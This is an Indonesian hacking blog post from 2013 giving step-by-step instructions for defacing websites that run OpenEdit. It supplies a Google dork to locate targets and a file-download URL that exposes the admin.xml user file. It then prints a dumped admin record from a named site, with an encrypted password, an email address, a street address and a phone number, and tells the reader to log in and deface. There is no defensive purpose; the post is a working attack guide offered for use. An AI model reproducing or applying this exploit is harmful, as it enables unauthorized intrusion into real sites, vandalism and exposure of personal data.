Deface Exploit Openedit

Posted by : Unknown Sabtu, 13 April 2013

Ketemu Lagi Dengan Ane Daffa-x207 :)
Langsung Aja :v

[#] Dorknya :

Code:
inurl:openedit/authentication/

[#] Exploitnya :

Code:
/openedit/files/download/WEB-INF/users/admin.xml

langsung saja gak usah banyak bacot lagi ..
kita langsung masuk step by step cara defacenya ..
kalo berhasil deface , jangan lupa cendol

========
[#] Step 1
========
- Kita Menuju Google Lalu masukan dork diatas , oh iya silakan explore sendiri dorknya biar lebih mantap

========
[#] Step 2
========
- Pilih salah satu target digoogle tadi
Example : http://mcdev.openedit.com/

========
[#] Step 3
========
- Masukan Exploitnya Tadi
jadinya kek gini ni :
http://mcdev.openedit.com/openedit/files/download/WEB-INF/users/admin.xml

========
[#] Step 4
========
- nah , kamu akan otomatis mengunduh sebuah file XML
setelah diunduh buka File XML yang unduh kamu tadi

========
[#] Step 5
========
- Didalam File XML tu ada Password Dan Username Admin sono .
Ni contohnya aneh dapet dari target atas tadi

<?xml version="1.0" encoding="UTF-8" ?>
- <user enabled="true">
  <user-name>admin</user-name>
  <password>DES:en9gFy2YMf0=</password>
  <creation-date>1145462580187</creation-date>
- <properties>
  <property name="billingAddress1" value="kj" />
  <property name="billingAddress2" value="kllkj" />
  <property name="Phone1" value="512-788-6787" />
  <property name="addresslist" value="my house,Home" />
  <property name="TaxRate" value="0.0000" />
  <property name="billingState" value="LKJ" />
  <property name="ship2State" value="5" />
  <property name="BillingState" value="SOME STATE" />
  <property name="AllowEmail" value="false" />
  <property name="my houseAddress1" value="home street" />
  <property name="showopenjobs" value="false" />
  <property name="homeCity" value="sadf" />
  <property name="my houseCountry" value="USA" />
  <property name="showjobsearch" value="false" />
  <property name="ship2Country" value="5" />
  <property name="billingCity" value="lkj" />
  <property name="firstName" value="Admin" />
  <property name="billingCountry" value="klj" />
  <property name="Company" value="The Administrator" />
  <property name="BillingAddress1" value="adress line 1" />
  <property name="lastName" value="User" />
  <property name="BillingCountry" value="USA" />
  <property name="HomeCity" value="Cincinnati" />
  <property name="HomeCountry" value="USA" />
  <property name="oe.edit.mode" value="preview" />
  <property name="HomeState" value="OH" />
  <property name="ship2Address2" value="2" />
  <property name="homeCountry" value="sadf" />
  <property name="ship2Address1" value="3" />
  <property name="HomeAddress1" value="5052 Gray Rd" />
  <property name="ship2City" value="1" />
  <property name="openadmintoolbar" value="true" />
  <property name="showcategoryselection" value="false" />
  <property name="BillingCity" value="somewhere" />
  <property name="showassetmanager" value="false" />
  <property name="email" value="jvalencia@openedit.org" />
  <property name="failedlogincount" value="0" />
  <property name="showfilter" value="false" />
  <property name="homeState" value="SDF" />
  <property name="homeAddress2" value="sadf" />
  <property name="homeAddress1" value="fdsa" />
  <property name="showtodosearch" value="false" />
  <property name="showbasket" value="false" />
  <property name="HomeZipCode" value="45232" />
  </properties>
  <group id="greenbaydie" />
  <group id="administrators" />
  <group id="honda" />
  <group id="orderers" />
  </user>

========
[#] Step 5
========
- Nah Tu Udah keliatan Pass adminnya
Langsung Aja Deh Login Kesini
http://mcdev.openedit.com/openedit/filemanager

========
[#] Step 6
========
- Done , Mision Selesai
Tgl Oprek Sesuka Hati<password>DES:en9gFy2YMf0=</password>

Passwordnnya Yang warna Merah Gak Perlu Di Apa2in Lagi Langsung Login

Description: Deface Exploit Openedit
Rating: 4.5
Reviewer: Unknown
ItemReviewed: Deface Exploit Openedit